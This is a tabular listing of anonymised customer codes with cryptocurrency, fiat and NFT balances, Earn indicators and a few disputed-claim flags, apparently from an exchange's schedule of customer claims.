| 07368343 | | BTC[0], CUSDT[1], SUSHI[0], USD[25.49] | | |
| 07368344 | | USD[10.00] | | |
| 07368346 | | DOGE[167.70982175], USD[0.00] | | |
| 07368347 | | USD[10.00] | | |
| 07368348 | | USD[10.00] | | |
| 07368350 | | USD[0.00] | | |
| 07368351 | | CUSDT[2], DOGE[4.03603333], ETHW[.26119617], GRT[1.00404471], USD[0.00] | Yes | |
| 07368352 | | USD[0.51] | | |
| 07368355 | | BTC[.04784818], DOGE[2341.8378], ETH[.9121318], ETHW[.9121318], SOL[21.07889], UNI[12.64604], USD[776.36] | | |
| 07368356 | | CUSDT[5], DOGE[0], ETH[0], ETHW[0], USD[0.01] | | |
| 07368357 | | USD[10.00] | | |
| 07368358 | | BAT[1.01655549], TRX[4], USD[0.00] | Yes | |
| 07368359 | | CUSDT[10], DOGE[1], SOL[.00196425], USD[-0.23] | Yes | |
| 07368360 | | BF_POINT[300], BRZ[4], BTC[0], CUSDT[5], DOGE[0], ETH[0], ETHW[0], LTC[0], TRX[8], USD[0.00] | | |
| 07368361 | | USD[20.00] | | |
| 07368362 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368363 | | USD[0.00] | | |
| 07368364 | | BRZ[1], CUSDT[1], DOGE[513.49878134], SOL[5.26839392], TRX[331.58907404], USD[0.00] | Yes | |
| 07368367 | | USD[0.00] | | |
| 07368369 | | CUSDT[7], LTC[0], SOL[0], TRX[2], USD[0.00], USDT[0] | | |
| 07368370 | | BRZ[1], CUSDT[4], TRX[2], USD[0.00], USDT[0] | | |
| 07368371 | | USD[0.00] | | |
| 07368372 | | USD[10.00] | | |
| 07368373 | | GRT[5.35859991], USD[0.00] | | |
| 07368374 | | CUSDT[2], DOGE[3.000548], LINK[40.64114590], SOL[23.11739558], TRX[1], USD[0.00] | Yes | |
| 07368375 | | USD[10.00] | | |
| 07368376 | | USD[10.00] | | |
| 07368377 | | BTC[.00238271], CUSDT[1], DOGE[2], ETH[.01909936], ETHW[.01909936], USD[70.00] | | |
| 07368378 | | USD[10.00] | | |
| 07368379 | | BTC[0], DOGE[0.39939569], USD[0.00] | | |
| 07368380 | | USD[10.00] | | |
| 07368381 | | CUSDT[4], DOGE[0], USD[0.00] | | |
| 07368382 | | BAT[1], BRZ[5], CUSDT[7], DOGE[275.49781471], GRT[1], TRX[2], USD[5.45], USDT[1] | | |
| 07368383 | | BCH[.00054748], BRZ[1], ETH[.00007663], ETHW[.00007663], GRT[.07771722], LINK[.00038011], LTC[.000036], SHIB[4], SUSHI[.00089479], TRX[3.69032081], USD[0.01] | Yes | |
| 07368384 | | USD[10.00] | | |
| 07368387 | | USD[0.02] | Yes | |
| 07368388 | | USD[0.00] | | |
| 07368389 | | DOGE[425.71260722], ETH[.06341048], ETHW[.06341048], GRT[9.80747201], SUSHI[1.29713712], TRX[1], USD[150.00] | | |
| 07368390 | | CUSDT[2], DOGE[481.71388098], USD[0.00] | | |
| 07368391 | | USD[10.00] | | |
| 07368392 | | USD[10.00] | | |
| 07368393 | | AUD[0.00], BRZ[0], CUSDT[0], ETH[0], EUR[0.00], USD[0.01] | Yes | |
| 07368394 | | USD[10.00] | | |
| 07368396 | | GBP[0.42], USD[14.38] | | |
| 07368397 | | DOGE[1.0000009], USD[0.04], USDT[0] | | |
| 07368398 | | USD[10.00] | | |
| 07368399 | | DOGE[8110.79873782], GRT[1], LINK[2.18120228], MATIC[6.60115466], SHIB[4737977.59224694], SOL[3.45490179], TRX[2160.78829058], UNI[2.11830457], USD[0.01], USDT[0] | | |
| 07368400 | | DOGE[0], USD[0.13], USDT[0] | | |
| 07368401 | | USD[10.00] | | |
| 07368403 | | BRZ[2], CUSDT[3], DOGE[105.05492892], TRX[1], USD[0.00] | | |
| 07368405 | | USD[10.00] | | |
| 07368406 | | USD[10.00] | | |
| 07368407 | | BRZ[1], DOGE[0], USD[0.00] | | |
| 07368408 | | CUSDT[1], DOGE[1], SHIB[0], USD[0.98] | Yes | |
| 07368409 | | BTC[.0000048], DOGE[3437.196], USD[0.00], USDT[.014006] | | |
| 07368410 | | USD[10.00] | | |
| 07368412 | | USD[0.00] | | |
| 07368413 | | BAT[.00004644], BRZ[57.84156675], CUSDT[5.00068363], GRT[45.53711509], SHIB[1], USD[0.00], USDT[0.00006151] | | |
| 07368415 | | USD[10.00] | | |
| 07368416 | | BAT[1561.76574403], BRZ[2], CUSDT[5], DOGE[5], ETH[.20484062], ETHW[.20484062], MATIC[196.03158605], SHIB[2], SOL[23.01206087], TRX[1], USD[0.00], USDT[2] | | |
| 07368417 | | TRX[691.79192574], USD[0.00] | | |
| 07368418 | | BAT[2], BRZ[1], CUSDT[2], DOGE[1], GRT[0], TRX[5], USD[0.00], USDT[1] | | |
| 07368419 | | BTC[.0405372], ETH[.153384], ETHW[.153384], LINK[25.8024], LTC[.00027359], SOL[39.84], SUSHI[15.438], TRX[54.78], USD[0.33] | | |
| 07368420 | | USD[10.00] | | |
| 07368421 | | DOGE[0], USD[0.00] | | |
| 07368423 | | DOGE[135.95827646], USD[5.00] | | |
| 07368424 | | CUSDT[1], DOGE[269.86188435], USD[0.01] | | |
| 07368425 | | BAT[14.73056276], USD[0.00] | | |
| 07368426 | | BAT[1], DOGE[3], SOL[106.17249198], TRX[2], UNI[1.06593303], USD[0.01], USDT[1.06575477] | Yes | |
| 07368428 | | USD[551.59] | | |
| 07368429 | | USD[10.00] | | |
| 07368430 | | USD[10.00] | | |
| 07368431 | | USD[10.00] | | |
| 07368432 | | BTC[0], LTC[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368433 | | USD[0.00] | | |
| 07368434 | | USD[10.00] | | |
| 07368435 | | BRZ[2], CUSDT[7], DOGE[3044.58141372], SHIB[3796816.22274879], SOL[2.08292858], SUSHI[1.09859939], TRX[1], USD[0.00], USDT[1.09898067] | Yes | |
| 07368436 | | BRZ[1], BTC[0], DOGE[1], SHIB[2], TRX[1], USD[0.01] | Yes | |
| 07368437 | | USD[10.00] | | |
| 07368438 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07368439 | | USD[10.00] | | |
| 07368440 | | CUSDT[1123.85980397], PAXG[.02815997], SHIB[858103.42642003], USD[0.00] | Yes | |
| 07368441 | | USD[10.00] | | |
| 07368442 | | BAT[2.09590857], BRZ[3], CUSDT[6], DOGE[869.38531684], ETH[.0250428], ETHW[.02472793], GRT[1.00367791], SOL[1.87883842], TRX[3], USD[0.00] | Yes | |
| 07368443 | | DOGE[1], TRX[3], USD[0.01] | | |
| 07368444 | | BCH[0], BRZ[23.17383120], CAD[0.00], CUSDT[1], LTC[0], MKR[.00183595], SHIB[1], USD[0.00] | Yes | |
| 07368446 | | DOGE[19.7446398], USD[0.00] | | |
| 07368447 | | CUSDT[2], DOGE[7190.19862706], ETH[.03754397], ETHW[.03707885], TRX[2], USD[21.56] | Yes | |
| 07368448 | | CUSDT[2], USD[105.17] | | |
| 07368449 | | BCH[0], BTC[0], DOGE[1], GRT[0], LTC[0], MATIC[.00011033], TRX[0], USD[0.00] | Yes | |
| 07368450 | | USD[10.00] | | |
| 07368451 | | ETH[.00000015], ETHW[.00000015], USD[0.00] | | |
| 07368453 | | DOGE[610.95941354], USD[0.00] | | |
| 07368454 | | USD[10.00] | | |
| 07368455 | | USD[10.00] | | |
| 07368456 | | SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07368457 | | BAT[0], BCH[0], BTC[0], CUSDT[1], DOGE[574.38547404], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07368458 | | USD[10.00] | | |
| 07368459 | | BTC[.00000023], USD[0.00] | Yes | |
| 07368460 | | CUSDT[1], USD[0.01], USDT[1] | | |
| 07368463 | | USD[10.00] | | |
| 07368464 | | CUSDT[1], TRX[139.8819485], USD[0.01] | | |
| 07368465 | | USD[10.00] | | |
| 07368467 | | USD[10.00] | | |
| 07368468 | | USD[10.00] | | |
| 07368469 | | CUSDT[1], DOGE[1.00418449], USD[0.01] | | |
| 07368471 | | CUSDT[1], ETH[0], USD[0.00] | | |
| 07368472 | | BRZ[0.00311233], USD[0.00] | | |
| 07368473 | | AVAX[1.58799967], CUSDT[7], DOGE[96.81378099], LINK[14.06891817], SHIB[2068785.8180953], SOL[15.24694372], TRX[90.66655258], USD[0.00] | | |
| 07368474 | | BRZ[1], DOGE[.00000093], USD[0.70] | | |
| 07368475 | | DOGE[129.21537341], GRT[10.35789457], TRX[2], USD[0.01] | | |
| 07368479 | | USD[10.00] | | |
| 07368480 | | BAT[1], BRZ[4], CUSDT[8], GRT[2], SOL[1], TRX[3], UNI[1], USD[0.01], USDT[1] | | |
| 07368481 | | USD[10.00] | | |
| 07368482 | | USD[10.00] | | |
| 07368483 | | BTC[.01993843], DOGE[11547.13601807], TRX[1], USD[0.00] | Yes | |
| 07368484 | | CUSDT[8.02296359], TRX[1], USD[6.24] | | |
| 07368485 | | BTC[0.00001392], CUSDT[14], DOGE[1], ETH[.00082923], ETHW[.00081576], GRT[1.88226257], LTC[.02118067], SOL[.08255511], SUSHI[.35984778], TRX[143.67002303], UNI[.36395401], USD[0.65], USDT[0.00007388], YFI[.00011097] | Yes | |
| 07368486 | | DOGE[2], USD[0.00] | | |
| 07368488 | | DOGE[31.1375642], USD[0.00] | | |
| 07368489 | | BRZ[2], DOGE[2.01743245], ETH[0], SHIB[2], TRX[0], USD[0.00] | Yes | |
| 07368490 | | CUSDT[1], DOGE[300.0444393], USD[0.00] | | |
| 07368491 | | CUSDT[1], DOGE[176.48931016], USD[0.01] | | |
| 07368492 | | BAT[4.855711], BRZ[3.82000000], CUSDT[2.75748636], GRT[1.7376836], NFT [288491035345124974/Nespace Album #62][1], NFT [413292668458044074/Surreal World #77][1], NFT [454832614403859893/Nespace Album #64][1], NFT [462784608299256705/Metaverse Rooms #24][1], NFT [535106070370738183/Metaverse Rooms #26][1], NFT [567676188487371589/Nespace Album #67][1], TRX[1], USD[0.00] | | |
| 07368493 | | DOGE[1], ETH[.005493], ETHW[.005493], USD[0.00] | | |
| 07368494 | | CUSDT[9.8076927], DOGE[134.89324649], USD[0.00] | | |
| 07368495 | | TRX[211.46951434], USD[0.00] | | |
| 07368496 | | USD[0.00] | | |
| 07368497 | | USD[10.00] | | |
| 07368499 | | BTC[0], DOGE[0], MATIC[0], SHIB[3328724.49628840], USD[0.04] | | |
| 07368500 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368501 | | DOGE[1.2530232], USD[0.81], USDT[1] | | |
| 07368502 | | BAT[1.0165555], CUSDT[2], DOGE[11718.48209707], TRX[192.80535792], USD[0.00] | Yes | |
| 07368503 | | CUSDT[2], DOGE[.84739837], TRX[1], USD[0.00] | | |
| 07368504 | | DOGE[610.81058502], ETH[.00565925], ETHW[.00565925], TRX[2678.57484517], USD[0.00] | | |
| 07368505 | | USD[0.00] | Yes | |
| 07368507 | | USD[10.00] | | |
| 07368509 | | USD[10.00] | | |
| 07368510 | | USD[0.00] | | |
| 07368511 | | DOGE[1], SUSHI[6.78200062], USD[10.84] | Yes | |
| 07368512 | | USD[10.00] | | |
| 07368514 | | AVAX[0], BTC[0.01524953], DOGE[0], ETH[0.16820154], ETHW[0.08695990], MATIC[505.13997649], USD[0.76] | Yes | |
| 07368515 | | CUSDT[472.78285893], DOGE[260.85120078], TRX[610.75291207], USD[0.54] | | |
| 07368516 | | USD[10.00] | | |
| 07368518 | | BRZ[1], CUSDT[1.00003896], DOGE[0], ETH[.00002805], ETHW[.00002805], GRT[5.58468352], TRX[2], USD[0.00] | | |
| 07368519 | | USD[10.00] | | |
| 07368520 | | USD[0.00] | | |
| 07368521 | | USD[10.00] | | |
| 07368522 | | ETH[2.01930386], ETHW[9.75482722], NFT (36084100119253146/Bahrain Ticket Stub #2457)[1], USD[0.00], USDT[0.00002067] | | |
| 07368523 | | AUD[0.00], BAT[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[0], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], KSHIB[0.02779907], MATIC[0], MKR[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07368524 | | BRZ[1], BTC[.00664139], CUSDT[1], DOGE[5552.33634133], ETH[.49933342], ETHW[.49912366], GRT[1.00498957], TRX[3], USD[0.02], USDT[1.09679493] | Yes | |
| 07368525 | | LTC[.04522154], TRX[1], USD[0.00] | | |
| 07368526 | | CUSDT[1], LINK[1.00711321], TRX[1], USD[0.00] | | |
| 07368527 | | BCH[0], DOGE[0], USD[0.00] | | |
| 07368528 | | USD[10.00] | | |
| 07368529 | | BRZ[1], BTC[0], CUSDT[8], DOGE[1303.05273961], ETH[.09117807], ETHW[.09117807], TRX[3.25], USD[0.00], WBTC[.00518345] | | |
| 07368530 | | BRZ[3], DOGE[1], ETH[0.00001020], ETHW[0.00001020], SHIB[50779901.90300831], SOL[0], TRX[5], USD[160.75], USDT[0] | Yes | |
| 07368531 | | KSHIB[245.62517009], USD[0.00] | | |
| 07368533 | | CUSDT[1], USD[0.00] | Yes | |
| 07368535 | | USD[10.00] | | |
| 07368536 | | BTC[0], ETH[.00000001], SOL[0], USD[0.00] | | |
| 07368537 | | CUSDT[2], DOGE[68.85489093], TRX[1], USD[0.29] | | |
| 07368538 | | BAT[353.398234], BCH[.11339728], BRZ[1], BTC[.00489143], CUSDT[12], DOGE[159.88084886], ETH[.05162697], ETHW[.05098354], SOL[3.12257102], SUSHI[.04010149], TRX[1], USD[0.61] | Yes | |
| 07368539 | | USD[10.00] | | |
| 07368541 | | DOGE[17.4764013], USD[0.00] | | |
| 07368542 | | USD[10.00] | | |
| 07368543 | | USD[10.00] | | |
| 07368545 | | TRX[1], USD[0.01] | Yes | |
| 07368546 | | SOL[5.06250402], USD[0.01], USDT[0.00000001] | | |
| 07368549 | | DOGE[1571.17437134], SHIB[1], USD[0.53] | | |
| 07368550 | | USD[10.00] | | |
| 07368551 | | USD[10.00] | | |
| 07368552 | | BTC[.00020019], USD[0.00] | Yes | |
| 07368554 | | USD[0.00] | | |
| 07368555 | | DOGE[.21917795], TRX[26.77518685], USD[0.08], USDT[4.96707262] | | |
| 07368557 | | USD[10.00] | | |
| 07368558 | | USD[3.35] | | |
| 07368559 | | USD[10.00] | | |
| 07368560 | | USD[10.00] | | |
| 07368561 | | DOGE[.00072984], ETH[0.00000124], ETHW[0.00000124], SHIB[1], SUSHI[.00001343], USD[0.00] | Yes | |
| 07368562 | | USD[0.00] | | |
| 07368563 | | CUSDT[1], USD[0.01] | | |
| 07368564 | | DOGE[138.85681682], USD[0.00] | | |
| 07368565 | | USD[10.00] | | |
| 07368566 | | DOGE[664.82388956], SHIB[1135.51856943], USD[0.03] | | |
| 07368567 | | CUSDT[2], DOGE[2], USD[0.00] | | |
| 07368568 | | BRZ[1], CUSDT[3], DOGE[0], ETH[0], TRX[2], USD[1.43] | | |
| 07368569 | | BRZ[1], CUSDT[2], SUSHI[.55684361], TRX[3], USD[0.25] | | |
| 07368570 | | DOGE[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368571 | | USD[10.00] | | |
| 07368572 | | BAT[199.39945937], BRZ[1], CUSDT[34.19354439], DOGE[195.28747889], TRX[1386.18024829], USD[0.00] | Yes | |
| 07368573 | | BAT[0.00017756], BTC[0], DOGE[0], ETH[0], MATIC[0], SOL[0], TRX[1], USD[0.00], USDT[1.04248465] | Yes | |
| 07368574 | | DOGE[1], USD[0.01] | | |
| 07368575 | | USD[110.00] | | |
| 07368576 | | BAT[1], DOGE[15960.20448114], USD[0.00] | | |
| 07368577 | | BRZ[1], CUSDT[3], USD[0.01] | | |
| 07368579 | | CUSDT[5], DOGE[406.23056144], SOL[3.04598987], SUSHI[1.39888783], USD[5.33] | Yes | |
| 07368581 | | USD[10.00] | | |
| 07368582 | | BTC[.0002997], DOGE[0], ETH[.005], ETHW[.005], LTC[.01], SHIB[800000], SOL[.05], SUSHI[2], USD[0.47], USDT[0 | | |
| 07368584 | | USD[10.00] | | |
| 07368585 | | USD[10.00] | | |
| 07368586 | | USD[10.93] | Yes | |
| 07368587 | | USD[10.00] | | |
| 07368588 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07368589 | | USD[10.00] | | |
| 07368590 | | CUSDT[1], DOGE[ 27439751], TRX[.23222381], USD[0.01] | | |
| 07368591 | | BRZ[1], CUSDT[15], DOGE[40.4267118], ETH[.00000014], ETHW[.00000014], GRT[.15730285], TRX[1.00002951], USD[0.00] | | |
| 07368592 | | BTC[.00021193], USD[0.00] | | |
| 07368593 | | BTC[0], USD[0.00] | | |
| 07368594 | | BRZ[0.00002544], DOGE[2], ETH[0], USD[0.00] | | |
| 07368595 | | USD[10.00] | | |
| 07368596 | | USD[0.00] | Yes | |
| 07368597 | | USD[10.00] | | |
| 07368598 | | CUSDT[7], DOGE[0], ETH[0], GRT[1], SHIB[37436.09966789], TRX[6], USD[0.00], USDT[1.0834152] | Yes | |
| 07368599 | | USD[10.00] | | |
| 07368600 | | USD[10.00] | | |
| 07368601 | | DOGE[188.93527039], USD[0.00] | | |
| 07368603 | | BTC[0], USD[0.01] | | |
| 07368604 | | CUSDT[2], USD[0.01] | | |
| 07368605 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07368606 | | USD[10.00] | | |
| 07368607 | | CUSDT[1], DOGE[139.02078485], USD[0.00] | | |
| 07368608 | | CUSDT[1], DOGE[68.46759139], USD[20.40] | | |
| 07368609 | | USD[10.00] | | |
| 07368611 | | BTC[.00000053], ETH[.00003256], ETHW[.00003256], SOL[.00031712], USD[0.03] | | |
| 07368612 | | DOGE[.94] | | |
| 07368613 | | USD[10.00] | | |
| 07368615 | | TRX[.000004], USDT[0.00000026] | | |
| 07368618 | | DOGE[2], USD[0.00] | | |
| 07368619 | | CUSDT[1], USD[0.01] | | |
| 07368620 | | USD[0.00] | | |
| 07368621 | | USD[10.00] | | |
| 07368622 | | USD[10.00] | | |
| 07368623 | | USD[10.00] | | |
| 07368624 | | DOGE[1], GRT[4.27874277], USD[0.00] | | |
| 07368625 | | SOL[7.2538], USD[832.60] | | |
| 07368628 | | USD[10.00] | | |
| 07368631 | | CUSDT[2], DOGE[47.76094392], USD[0.00] | | |
| 07368632 | | BTC[.00451934], CUSDT[13], DOGE[9], ETH[.03276894], ETHW[.03276894], TRX[7], USD[252.00] | | |
| 07368633 | | USD[10.00] | | |
| 07368634 | | USD[0.00] | | |
| 07368635 | | CUSDT[1], DOGE[1749.89694446], TRX[1], USD[0.00] | | |
| 07368636 | | USD[10.00] | | |
| 07368637 | | DOGE[.00815033], USD[0.00] | | |
| 07368638 | | USD[10.00] | | |
| 07368639 | | USD[10.62] | Yes | |
| 07368640 | | DOGE[467.26684203], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368641 | | DOGE[141.11931892], USD[0.00] | | |
| 07368642 | | DOGE[407.6675736], USD[0.01] | | |
| 07368643 | | USD[7.17] | Yes | |
| 07368644 | | CUSDT[40.35355278], DOGE[4.52762866], TRX[365.35510468], USD[0.00] | | |
| 07368645 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07368646 | | DOGE[1036.97421984], SHIB[16.40541093], USD[0.00] | Yes | |
| 07368648 | | DOGE[2], ETHW[.09945371], USD[285.61] | | |
| 07368649 | | CUSDT[1], DOGE[19.35394817], USD[0.00] | | |
| 07368650 | | ALGO[627.56663036], SHIB[2307778.05145863], SOL[66.49906496], USD[0.00] | Yes | |
| 07368651 | | BTC[0.00008698], SUSHI[.398], USD[0.99] | | |
| 07368652 | | CUSDT[1], DOGE[1.4289268], USD[0.00] | | |
| 07368653 | | USD[10.00] | | |
| 07368657 | | BAT[.1542], DOGE[.6722], ETH[0.00069452], ETHW[0.00069452], GRT[.29415], SOL[.5636], SUSHI[0.06490000], TRX[.2984], USD[4.83] | | |
| 07368658 | | BRZ[3], CUSDT[2], TRX[3], USD[0.01] | | |
| 07368659 | | DOGE[20676387], USD[0.00] | | |
| 07368660 | | BRZ[1], USD[0.46] | | |
| 07368661 | | CUSDT[3], DOGE[3.80918545], GRT[20.36824668], SUSHI[1.93283356], UNI[.57249163], USD[0.01], USDT[.78214797] | | |
| 07368662 | | BAT[3.18726776], BRZ[11.83161234], CUSDT[61.67382361], DOGE[18382.40193764], SHIB[31509589.52009408], TRX[3240.09631871], USD[250.91], USDT[3.3188737] | Yes | |
| 07368663 | | DOGE[178.20159661], USD[0.00] | | |
| 07368664 | | USD[10.00] | | |
| 07368665 | | USD[10.00] | | |
| 07368666 | | USD[10.00] | | |
| 07368667 | | USD[10.00] | | |
| 07368668 | | DOGE[35.93224816], USD[0.00] | | |
| 07368669 | | DOGE[.00002634], USD[0.00] | | |
| 07368670 | | TRX[.00009593], USD[0.00] | | |
| 07368671 | | BRZ[2], BTC[.00192625], CUSDT[12], DOGE[2574.47585191], ETH[.03289624], ETHW[.03248784], TRX[2162.72904308], USD[178.55], USDT[0.00000001] | Yes | |
| 07368673 | | USD[10.00] | | |
| 07368674 | | USD[10.00] | | |
| 07368675 | | DOGE[136.58690628], USD[0.00] | | |
| 07368677 | | CUSDT[1], DOGE[21067.86170983], USD[0.00], USDT[0] | Yes | |
| 07368679 | | BF_POINT[200], BTC[.00000021], ETHW[.13780438], NFT (460140763554219060/2D SOLDIER #910)[1], TRX[9], USD[1527.25] | Yes | |
| 07368680 | | USD[10.00] | | |
| 07368682 | | CUSDT[1], USD[0.00] | | |
| 07368683 | Contingent, Disputed | BTC[.1039824], GRT[1202.724], SOL[210.156], UNI[70.8156], USD[381.71], YFI[.050859] | | |
| 07368684 | | USD[10.00] | | |
| 07368686 | | DOGE[.51562439], USD[10.77] | | |
| 07368687 | | USD[10.00] | | |
| 07368689 | | USD[10.00] | | |
| 07368690 | | USD[0.00], USDT[0] | | |
| 07368691 | | BTC[0], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.39], USDT[0] | | |
| 07368692 | | BAT[0], BRZ[7.46690166], BTC[0.00776117], CUSDT[10], DOGE[2159.28116642], LTC[0], MATIC[200.61094501], MKR[.0000022], SHIB[42], SOL[0], SUSHI[0], TRX[9], USD[57.79], USDT[1.07240008], YFI[0.00000020] | Yes | |
| 07368693 | | AVAX[.00016557], BRZ[2], CUSDT[1], DOGE[3], GRT[2.00367791], SHIB[3], SOL[0], TRX[5], USD[0.00], USDT[1.02543198] | Yes | |
| 07368694 | | USD[0.05] | | |
| 07368695 | | USD[10.00] | | |
| 07368696 | | BRZ[1], CUSDT[6], TRX[2], USD[0.00] | Yes | |
| 07368697 | | USD[10.00] | | |
| 07368699 | | USD[0.01], USDT[0] | Yes | |
| 07368700 | | DOGE[2], USD[0.01] | | |
| 07368701 | | BAT[1], TRX[165.12378741], USD[0.01] | | |
| 07368702 | | CUSDT[2], DOGE[905.89537920], USD[0.00] | | |
| 07368703 | | BTC[0], LTC[0], SOL[0], USD[0.00] | | |
| 07368704 | | BCH[0], BTC[0], ETH[0], SHIB[163977.37895391], USD[0.00] | Yes | |
| 07368705 | | USD[10.00] | | |
| 07368706 | | USD[10.00] | | |
| 07368708 | | USD[10.00] | | |
| 07368709 | | DOGE[139.96745476], USD[0.00] | | |
| 07368710 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368711 | | BTC[0], USD[0.25] | | |
| 07368712 | | USD[10.00] | | |
| 07368713 | | USD[10.00] | | |
| 07368714 | | BTC[.00074495], TRX[1], USD[0.00] | | |
| 07368716 | | BTC[0], CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07368718 | | USD[10.00] | | |
| 07368719 | | CUSDT[9], DOGE[1572.01459953], USD[0.58] | | |
| 07368720 | | BAT[0], BRZ[0], DOGE[15250.04874265], ETH[0.00000001], ETHW[0.00000001], GRT[0], LINK[0], MATIC[124.69473769], SOL[0], TRX[0], UNI[.00000001], USD[0.00], USDT[0] | Yes | |
| 07368721 | | USD[10.00] | | |
| 07368722 | | BTC[0], ETH[0], SOL[.00000001], USD[0.00] | | |
| 07368723 | | USD[10.00] | | |
| 07368725 | | BAT[0], BTC[.00960073], DAI[.00000001], ETH[0.23949509], ETHW[0.23929580], GRT[0], USD[0.00] | Yes | |
| 07368726 | | BCH[.01040695], BTC[.0002913], DOGE[1], SOL[.01781471], SUSHI[.09440456], TRX[1], USD[21.16] | | |
| 07368727 | | USD[10.00] | | |
| 07368728 | | BTC[.1299072], DOGE[7591.87], ETH[2.717496], ETHW[2.717496], USD[0.48] | | |
| 07368730 | | CUSDT[1], DOGE[2077.19519709], USD[0.22] | | |
| 07368731 | | USD[10.00] | | |
| 07368732 | | DOGE[123.47121034], USD[0.00] | | |
| 07368733 | | DOGE[4378.73808231], TRX[1], USD[0.00] | | |
| 07368735 | | ETH[.00000027], ETHW[.02964272], LTC[.00000147], SHIB[2], SOL[0.00003965], USD[119.88] | Yes | |
| 07368737 | | CUSDT[1], DOGE[498.98487702], SHIB[2147.45884037], USD[0.07] | | |
| 07368738 | | DOGE[8382.92129960], TRX[2220.05890206], USD[0.00] | | |
| 07368739 | | BAT[0], BRZ[2], BTC[0], CUSDT[15], DOGE[3.63402671], GRT[.00002556], SOL[.00000789], USD[0.00] | Yes | |
| 07368741 | | USD[10.00] | | |
| 07368742 | | DOGE[.04985931], USD[0.00] | | |
| 07368743 | | USD[10.00] | | |
| 07368744 | | BCH[.00566405], DOGE[20.38341374], USD[0.00] | | |
| 07368745 | | USD[0.24] | | |
| 07368746 | | DOGE[0], SHIB[5], USD[0.00], USDT[0] | Yes | |
| 07368748 | | USD[10.00] | | |
| 07368749 | | BRZ[3], CUSDT[4], DOGE[0], TRX[4], USD[0.00] | | |
| 07368750 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07368751 | | BTC[.00018106], USD[0.00] | | |
| 07368752 | | GRT[8.6229473], USD[0.00] | | |
| 07368753 | | USD[0.00] | | |
| 07368754 | | DOGE[1059.09871934], USD[10.00] | | |
| 07368756 | | BAT[2.105704], BRZ[3], CUSDT[3], DOGE[7.24149664], ETH[3.47173717], ETHW[3.47027907], LTC[.00004863], SUSHI[.00000876], UNI[.00000876], USD[0.00], USDT[2.19278009] | Yes | |
| 07368757 | | DOGE[2], ETH[.00004553], ETHW[15.50362079], SHIB[8], SOL[.00071036], USD[0.01] | Yes | |
| 07368758 | | USD[10.00] | | |
| 07368761 | | BRZ[2], CUSDT[1], DOGE[1122.07154834], GRT[1], USD[0.00] | | |
| 07368763 | | USD[10.00] | | |
| 07368764 | | DOGE[.00004155], TRX[1], USD[0.01] | | |
| 07368765 | | USD[10.00] | | |
| 07368767 | | CUSDT[8], DOGE[.00008774], TRX[.00007458], USD[0.00] | | |
| 07368770 | | USD[10.00] | | |
| 07368771 | | USD[10.00] | | |
| 07368772 | | USD[10.00] | | |
| 07368774 | | DOGE[1516.70431444], TRX[1], USD[731.62] | | |
| 07368775 | | USD[10.00] | | |
| 07368776 | | USD[10.00] | | |
| 07368777 | | BAT[3], BRZ[7], CUSDT[6], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[7], UNI[0], USD[0.00], USDT[0] | | |
| 07368779 | | USD[10.00] | | |
| 07368780 | | LINK[.35304403], USD[0.00] | | |
| 07368781 | | USD[10.00] | | |
| 07368782 | | USD[10.00] | | |
| 07368783 | | USD[0.06] | | |
| 07368784 | | CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], SUSHI[0], TRX[0], USD[0.05], USDT[0] | | |
| 07368785 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368786 | | USD[0.02] | | |
| 07368788 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07368789 | | BAT[.56173283], BRZ[4], CUSDT[13], DOGE[3], GRT[1], SHIB[1], TRX[4], USD[2.56] | Yes | |
| 07368790 | | BTC[0], SOL[0], USD[0.00] | | |
| 07368791 | | ETH[.00608532], ETHW[.00608532], USD[10.00] | | |
| 07368792 | | BAT[3.07555999], BRZ[4], CUSDT[2], DOGE[12.00260299], MATIC[.00003773], SHIB[10], SOL[97.50476605], TRX[6], USD[0.00] | Yes | |
| 07368793 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.31] | | |
| 07368794 | | USD[0.00] | | |
| 07368795 | | TRX[12.77654156], USD[0.00] | | |
| 07368796 | | SHIB[1], USD[39.52] | | |
| 07368797 | | DOGE[132.3677722], USD[0.00] | | |
| 07368798 | | USD[10.00] | | |
